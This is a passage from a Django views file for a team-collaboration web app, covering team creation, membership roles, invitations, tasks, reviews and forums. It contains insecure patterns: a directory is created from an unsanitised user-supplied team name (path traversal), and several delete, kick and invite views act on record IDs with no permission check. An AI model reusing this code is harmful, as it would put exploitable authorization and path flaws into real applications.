models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tteam_creation_form = forms.TeamCreationForm(request.POST)\n\t\tif team_creation_form.is_valid():\n\t\t\tselected_category = models.SubCategory.objects.get(id=request.POST['category'])\n\t\t\tteam = models.TeamProfile.objects.create(name=request.POST['name'], category=selected_category, description=request.POST['description'])\n\t\t\tteam.save()\n\t\t\tnew_team = 
models.TeamProfile.objects.get(name=request.POST['name'])\n\t\t\tleader = models.Membership.objects.create(user=logged_in_user, team=new_team, user_type='LDR')\n\t\t\tleader.save()\n\t\t\tos.mkdir(os.path.join(settings.BASE_DIR, 'lfg_app', 'static', 'images', 'team_images', request.POST['name']))\n\t\t\tnew_team = models.TeamProfile.objects.get(name=request.POST['name'])\n\t\t\treturn HttpResponseRedirect(reverse('team_creation_success', args=(new_team.id,)))\n\telse:\n\t\tteam_creation_form = forms.TeamCreationForm()\n\n\treturn render(request, 'team_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_creation_form':team_creation_form, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_creation_success(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\treturn render(request, 'team_creation_success.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_management(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tteam_management_form = forms.TeamManagementForm(request.POST, request.FILES)\n\t\tif team_management_form.is_valid():\n\t\t\trequested_team.name = request.POST['name']\n\t\t\trequested_team.recruiting = request.POST['recruiting']\n\t\t\trequested_team.country = request.POST['country']\n\t\t\trequested_team.city = request.POST['city']\n\t\t\trequested_team.address = request.POST['address']\n\t\t\trequested_team.image = request.FILES.get('image', 'default_images/default_team_img.jpg')\n\t\t\trequested_team.description = request.POST['description']\n\t\t\trequested_team.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_management', args=(requested_team.id,)))\n\telse:\n\t\tteam_management_form = forms.TeamManagementForm(initial={'name':requested_team.name, 'category':requested_team.category, 'recruiting':requested_team.recruiting, 'country':requested_team.country, 'city':requested_team.city, 
'address':requested_team.address, 'image':requested_team.image, 'description':requested_team.description})\n\n\treturn render(request, 'team_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_management_form':team_management_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_about_us(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\treturn render(request, 'team_about_us.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'leader':leader, 'mods':mods, 'users':users, 'requested_team':requested_team, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_overview(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_status_list = models.TeamStatus.objects.filter(team=requested_team)\n\n\tif request.method == 'POST':\n\t\tteam_status_form = forms.TeamStatusForm(request.POST)\n\t\tif team_status_form.is_valid():\n\t\t\tstatus = models.TeamStatus.objects.create(team=requested_team, content=request.POST['content'])\n\t\t\tstatus.save()\n\t\t\tHttpResponseRedirect(reverse('team_overview', args=(requested_team.id,)))\n\telse:\n\t\tteam_status_form = forms.TeamStatusForm()\n\n\tpaginator = Paginator(team_status_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_overview.html', {'new_messages_count':new_messages_count, 
'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'leader':leader, 'mods':mods, 'users':users, 'team_status_form':team_status_form, 'team_status_list':team_status_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef del_team_status(request, team_id, status_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tstatus = models.TeamStatus.objects.get(id=status_id)\n\tstatus.delete()\n\treturn HttpResponseRedirect(reverse('team_overview', args=(requested_team.id,)))\n\n\n@login_required\ndef team_members(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tmembers_list = models.Membership.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(members_list, 30)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_members.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'members_list':members_list, 'pages':pages, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_membership_management(request, team_id, member_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_member = User.objects.get(id=member_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\trequested_membership = models.Membership.objects.get(team=requested_team, user=requested_member)\n\n\tif request.method == 'POST':\n\t\tteam_membership_management_form = forms.MembershipManagementForm(request.POST)\n\t\tif 
team_membership_management_form.is_valid():\n\t\t\trequested_membership.user_type = request.POST['user_type']\n\t\t\tif request.POST['user_type'] == 'LDR':\n\t\t\t\told_leader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\t\t\t\told_leader.user_type = 'MOD'\n\t\t\t\told_leader.save()\n\t\t\trequested_membership.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_members', args=(requested_team.id,)))\n\telse:\n\t\tteam_membership_management_form = forms.MembershipManagementForm()\n\n\treturn render(request, 'team_membership_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_membership_management_form':team_membership_management_form, 'requested_team':requested_team, 'requested_member':requested_member, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef kick_member(request, team_id, member_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_member = models.Membership.objects.get(id=member_id)\n\n\trequested_member.delete()\n\treturn HttpResponseRedirect(reverse('team_members', args=(requested_team.id,)))\n\n\n@login_required\ndef team_invitation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tinvitation_requested = models.Invitation.objects.filter(team=requested_team)\n\n\tusers_list = None\n\tpages = None\n\n\tif request.method == 'POST':\n\t\tuser_search_form = forms.UserSearchForm(request.POST)\n\t\tif user_search_form.is_valid():\n\t\t\tusers_list = User.objects.filter(Q(username__icontains=request.POST['username']) | Q(first_name__icontains=request.POST['username']) | Q(last_name__icontains=request.POST['username']))\n\n\t\t\tpaginator = Paginator(users_list, 10)\n\t\t\tpage = request.GET.get('page')\n\t\t\ttry:\n\t\t\t\tpages = paginator.page(page)\n\t\t\texcept PageNotAnInteger:\n\t\t\t\tpages = paginator.page(1)\n\t\t\texcept EmptyPage:\n\t\t\t\tpages = paginator.page(paginator.num_pages)\n\n\telse:\n\t\tuser_search_form = forms.UserSearchForm()\n\n\treturn render(request, 'team_invitation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'invitation_requested':invitation_requested, 'user_search_form':user_search_form, 'users_list':users_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_invitation_creation(request, team_id, user_id):\n\trequested_team = 
models.TeamProfile.objects.get(id=team_id)\n\trequested_member = User.objects.get(id=user_id)\n\tinvitation = models.Invitation.objects.create(user=requested_member, team=requested_team)\n\tinvitation.save()\n\treturn HttpResponseRedirect(reverse('team_invitation', args=(requested_team.id,)))\n\n\n@login_required\ndef team_tasks(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_tasks_list = models.Tasks.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(team_tasks_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_tasks.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_tasks_list':team_tasks_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_tasks_creation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\ttask_creation_form = forms.TaskForm(request.POST)\n\t\tif task_creation_form.is_valid():\n\t\t\tnew_task = models.Tasks.objects.create(creator=logged_in_user, team=requested_team, task=request.POST['task'], description=request.POST['description'], priority=request.POST['priority'])\n\t\t\tnew_task.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_tasks', args=(requested_team.id,)))\n\telse:\n\t\ttask_creation_form = forms.TaskForm()\n\n\treturn render(request, 'team_tasks_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 
'new_invitations_count':new_invitations_count, 'task_creation_form':task_creation_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef task_finish(request, team_id, task_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\t\n\trequested_task.finish_task()\n\treturn HttpResponseRedirect(reverse('team_tasks', args=(requested_team.id,)))\n\n\n@login_required\ndef team_subtasks(request, team_id, task_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_subtasks_list = models.SubTasks.objects.filter(task=requested_task)\n\n\tpaginator = Paginator(team_subtasks_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_subtasks.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_subtasks_list':team_subtasks_list, 'pages':pages, 'requested_team':requested_team, 'requested_task':requested_task, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_subtasks_creation(request, team_id, task_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tsubtask_creation_form = forms.SubTaskForm(request.POST)\n\t\tif subtask_creation_form.is_valid():\n\t\t\tnew_subtask = models.SubTasks.objects.create(task=requested_task, 
subtask=request.POST['subtask'], description=request.POST['description'])\n\t\t\tnew_subtask.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_subtasks', args=(requested_team.id, requested_task.id,)))\n\telse:\n\t\tsubtask_creation_form = forms.SubTaskForm()\n\n\treturn render(request, 'team_subtasks_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'subtask_creation_form':subtask_creation_form, 'requested_team':requested_team, 'requested_task':requested_task, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef subtask_finish(request, team_id, task_id, subtask_id):\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_task = models.Tasks.objects.get(id=task_id)\n\trequested_subtask = models.SubTasks.objects.get(id=subtask_id)\n\t\n\trequested_subtask.finish_subtask()\n\treturn HttpResponseRedirect(reverse('team_subtasks', args=(requested_team.id, requested_task.id,)))\n\n\n@login_required\ndef team_reviews(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tteam_reviews_list = models.TeamReview.objects.filter(team=requested_team)\n\n\tpaginator = Paginator(team_reviews_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_reviews.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'team_reviews_list':team_reviews_list, 'pages':pages, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = 
models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tforum_list = models.Forum.objects.filter(team=requested_team)\n\n\treturn render(request, 'team_forum.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'forum_list':forum_list, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef team_forum_creation(request, team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tforum_creation_form = forms.ForumForm(request.POST)\n\t\tif forum_creation_form.is_valid():\n\t\t\tnew_forum = models.Forum.objects.create(team=requested_team, title=request.POST['title'])\n\t\t\tnew_forum.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum', args=(requested_team.id,)))\n\telse:\n\t\tforum_creation_form = forms.ForumForm()\n\n\treturn render(request, 'team_forum_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'forum_creation_form':forum_creation_form, 'requested_team':requested_team, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_threads(request, team_id, forum_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tthreads_list = models.Thread.objects.filter(forum=requested_forum)\n\n\tpaginator = Paginator(threads_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = 
paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'team_forum_threads.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'threads_list':threads_list, 'pages':pages, 'requested_team':requested_team, 'requested_forum':requested_forum, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_threads_creation(request, team_id, forum_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tif request.method == 'POST':\n\t\tthread_creation_form = forms.ThreadForm(request.POST)\n\t\tif thread_creation_form.is_valid():\n\t\t\tnew_thread = models.Thread.objects.create(forum=requested_forum, creator=logged_in_user, title=request.POST['title'])\n\t\t\tnew_thread.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_forum_threads', args=(requested_team.id, requested_forum.id,)))\n\telse:\n\t\tthread_creation_form = forms.ThreadForm()\n\n\treturn render(request, 'team_forum_threads_creation.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'thread_creation_form':thread_creation_form, 'requested_team':requested_team, 'requested_forum':requested_forum, 'leader':leader, 'mods':mods, 'users':users, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_forum_posts(request, team_id, forum_id, thread_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\trequested_forum = models.Forum.objects.get(id=forum_id)\n\trequested_thread = models.Thread.objects.get(id=thread_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tleader = models.Membership.objects.get(team=requested_team, user_type='LDR')\n\ttry:\n\t\tmods = models.Membership.objects.get(team=requested_team, user_type='MOD', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tmods = None\n\ttry:\n\t\tusers = models.Membership.objects.get(team=requested_team, user_type='USR', user=logged_in_user)\n\texcept models.Membership.DoesNotExist:\n\t\tusers = None\n\n\tposts_list = 
